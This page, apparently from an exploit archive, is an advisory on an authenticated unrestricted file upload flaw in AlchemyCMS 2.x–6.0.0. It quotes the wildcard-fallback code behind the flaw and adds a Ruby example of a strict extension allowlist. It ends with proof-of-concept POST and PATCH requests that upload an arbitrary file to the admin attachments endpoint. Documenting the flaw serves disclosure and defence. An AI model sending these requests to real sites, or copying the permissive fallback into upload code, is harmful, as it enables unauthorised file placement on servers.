## https://sploitus.com/exploit?id=PACKETSTORM:164496
# Exploit Title: AlchemyCMS 2.x to 6.0.0 - Unrestricted File Upload (authenticated)  
# Date: 01/10/2021  
# Exploit Author: Abdulrahman https://twitter.com/infosec_90  
# Vendor Homepage: https://alchemy-cms.com  
# Software Link: https://github.com/AlchemyCMS/alchemy_cms  
# Version: from 2.0 to 6.0.0  
# Tested on: Linux ruby 2.6.8p205 rails 6  
  
in /app/models/alchemy/attachment.rb, line 82:

  def allowed_filetypes
    # Falls back to an empty list when no "allowed_filetypes" entry exists for "alchemy/attachments"
    Config.get(:uploader).fetch("allowed_filetypes", {}).fetch("alchemy/attachments", [])
  end
end  # closes the enclosing class
  
in /app/views/alchemy/admin/uploader/_button.html.erb, line 18 (excerpt; the list falls back to ['*']):

configuration(:uploader)['allowed_filetypes'][object.class.model_name.collection] || ['*'] %>
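The two defaults quoted above (an empty list from the model, ['*'] from the view) are what let a file named anyfile.anyext through. The Ruby below is an added example, not AlchemyCMS code: it contrasts a policy that mirrors those defaults with a deny-by-default allowlist check of the kind an operator would want in front of attachment uploads. The module names, the allowed_filetypes_for helper and the constructed UPLOADER_CONFIG hash are assumptions, not values from the project.

```ruby
# Added example (not AlchemyCMS code). Two extension policies for uploaded attachments:
#  - PermissiveFiletypePolicy mirrors the defaults the advisory quotes
#    (empty list => ['*'], and '*' accepts any filename).
#  - StrictFiletypePolicy is deny-by-default: an explicit allowlist is required,
#    the wildcard is refused, and the extension is taken from the sanitized basename.
# All module/method names here are hypothetical.

module FiletypeExtension
  # Extension of the client-supplied filename, lowercased, without the dot,
  # computed on the basename so "../" segments in the name carry no weight.
  def self.of(filename)
    base = File.basename(filename.to_s)
    File.extname(base).downcase.delete_prefix('.')
  end
end

module PermissiveFiletypePolicy
  WILDCARD = '*'.freeze

  # Same fallback chain as the quoted model/view code: [] behaves like ['*'].
  def self.allowed?(filename, allowed_filetypes)
    list = (allowed_filetypes.nil? || allowed_filetypes.empty?) ? [WILDCARD] : allowed_filetypes
    return true if list.include?(WILDCARD)
    list.map { |e| e.downcase.delete_prefix('.') }.include?(FiletypeExtension.of(filename))
  end
end

module StrictFiletypePolicy
  WILDCARD = '*'.freeze

  # Deny unless the list is non-empty, contains no wildcard, and the file's
  # (non-empty) extension is explicitly listed. Case-insensitive, dot-optional.
  def self.allowed?(filename, allowed_filetypes)
    return false if allowed_filetypes.nil? || allowed_filetypes.empty?
    return false if allowed_filetypes.include?(WILDCARD)
    ext = FiletypeExtension.of(filename)
    return false if ext.empty?
    allowed_filetypes.map { |e| e.downcase.delete_prefix('.') }.include?(ext)
  end
end

# Constructed stand-in for an uploader config hash, shaped like the
# fetch chain in the quoted allowed_filetypes method (assumption).
UPLOADER_CONFIG = {
  'allowed_filetypes' => {
    'alchemy/attachments' => ['pdf', 'PNG'],
  },
}.freeze

# Same two-level fetch as the quoted model code, with its [] default.
def allowed_filetypes_for(config, collection)
  config.fetch('allowed_filetypes', {}).fetch(collection, [])
end

if __FILE__ == $PROGRAM_NAME
  list = allowed_filetypes_for(UPLOADER_CONFIG, 'alchemy/attachments')
  %w[anyfile.anyext report.PDF ../../passwd].each do |name|
    puts format('%-16s permissive(default)=%-5s strict=%-5s',
                name,
                PermissiveFiletypePolicy.allowed?(name, []),
                StrictFiletypePolicy.allowed?(name, list))
  end
end
```

With an unconfigured uploader the permissive policy accepts anyfile.anyext, exactly the PoC filename; the strict policy rejects it, and also rejects a configured-but-wildcard list and a name with no extension at all. An extension allowlist is one layer: the stored file's content type and where it is served from still need their own controls.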

POC:
POST /admin/attachments HTTP/1.1  
------WebKitFormBoundarydAup7dA7ub3Weccp  
Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext"  
Content-Type: application/octet-stream  
  
anything  
  
------WebKitFormBoundarydAup7dA7ub3Weccp--  

Or, replacing the file of an existing attachment (here id = 8):

  
PATCH /admin/attachments/8 HTTP/1.1  
------WebKitFormBoundarylYnqNR9sxMPdw7Si  
Content-Disposition: form-data; name="_method"  
  
patch  
------WebKitFormBoundarylYnqNR9sxMPdw7Si  
Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext"  
Content-Type: application/octet-stream  
  
anything  
------WebKitFormBoundarylYnqNR9sxMPdw7Si--